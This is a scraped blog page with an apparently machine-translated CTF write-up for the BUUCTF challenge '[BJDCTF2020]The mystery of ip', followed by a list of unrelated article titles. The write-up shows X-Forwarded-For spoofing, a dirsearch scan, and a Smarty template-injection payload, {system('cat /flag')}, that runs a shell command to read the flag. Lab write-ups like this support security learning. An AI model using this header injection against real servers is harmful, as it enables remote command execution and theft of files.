当前位置:网站首页>BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip
2022-04-23 12:33:00 【Y1Daa】
BUUCTF WEB [BJDCTF2020]The mystery of ip
-
stay hint.php Find a comment in
<!-- Do you know why i know your ip? -->
-
stay flag.php See yourself in ip, Associated with the X-Forwarded-For. Use Hackbar Add one HTTP head
X-Forwarded-For: 127.0.0.1
Echo as
Your IP is : 127.0.0.1
It shows that we have obtained controllable variables
-
Attempt to inject command failed , There's no idea here , Try dirsearch See if you can get any information
# Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/ 200 6KB http://node4.buuoj.cn:28825/.DS_Store 301 169B http://node4.buuoj.cn:28825/css -> REDIRECTS TO: http://node4.buuoj.cn/css/ 200 2KB http://node4.buuoj.cn:28825/flag.php 200 938B http://node4.buuoj.cn:28825/header.php 301 169B http://node4.buuoj.cn:28825/img -> REDIRECTS TO: http://node4.buuoj.cn/img/ 301 169B http://node4.buuoj.cn:28825/libs -> REDIRECTS TO: http://node4.buuoj.cn/libs/ 301 169B http://node4.buuoj.cn:28825/templates_c -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/ 403 555B http://node4.buuoj.cn:28825/templates_c/
We found one called
/template_c/
Folder , Template injection is suspected -
take X-Forwarded-For Change it to
X-Forwarded-For: {6*6}
Echo as
Your IP is : 36
-
Attempt to read directly flag file
X-Forwarded-For: {system('cat /flag')}
The echo
Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}
版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231227159550.html
边栏推荐
- Markdown grammar learning
- 【微信小程序】z-index失效
- How much does software testing help reduce program bugs?
- IDEA设置版权信息
- BUUCTF WEB [GXYCTF2019]禁止套娃
- Stm32cubeprogrammer basic instructions
- Fastjson 2 is coming, the performance continues to improve, and it can fight for another ten years
- How do programmers finalize nucleic acid statistics with 130 lines of code
- Next. JS static data generation and server-side rendering
- I changed to a programmer at the age of 31. Now I'm 34. Let me talk about my experience and some feelings
猜你喜欢
IDEA 数据库插件Database Navigator 插件
worder字体网页字体对照表
CGC: contractual graph clustering for community detection and tracking
Metalama简介4.使用Fabric操作项目或命名空间
基于卷积神经网络的遥感影像分类识别系统
Windows11 安装MySQL服务 提示:Install/Remove of the Service Denied
SPSS之单因素方差分析
Analysis of InnoDB execution process in MySQL
STM32控制步进电机(ULN2003+28byj)
Pagoda panel command line help tutorial (including resetting password)
随机推荐
力扣刷题之完全二叉树的节点个数
Next. JS static data generation and server-side rendering
网络信息安全之零信任
The database navigator uses the default MySQL connection prompt: the server time zone value 'Ö Ð¹ ú±ê ×¼ ʱ ¼ ä’ is unrecognized or repres
【Redis 系列】redis 学习十三,Redis 常问简单面试题
5-minute NLP: text to text transfer transformer (T5) unified text to text task model
How much does software testing help reduce program bugs?
面了一圈,整理了这套面试题。。
In idea Solution to the problem of garbled code in Chinese display of properties file
论文解读(CGC)《CGC: Contrastive Graph Clustering for Community Detection and Tracking》
Zigbee之CC2530最小系统及寄存器配置(1)
SQLserver怎么插入或更新当天的星期数,bit而不是文本
MySQL函数-递归函数
宝塔面板命令行帮助教程(包含重置密码)
uni-app 原生APP-云打包集成极光推送(JG-JPUSH)详细教程
Lesson 23 temporary objects
On using go language to create websocket service
实现一个盒子在父盒子中水平垂直居中的几种“姿势”
甲辰篇 創世紀《「內元宇宙」聯載》
worder字体网页字体对照表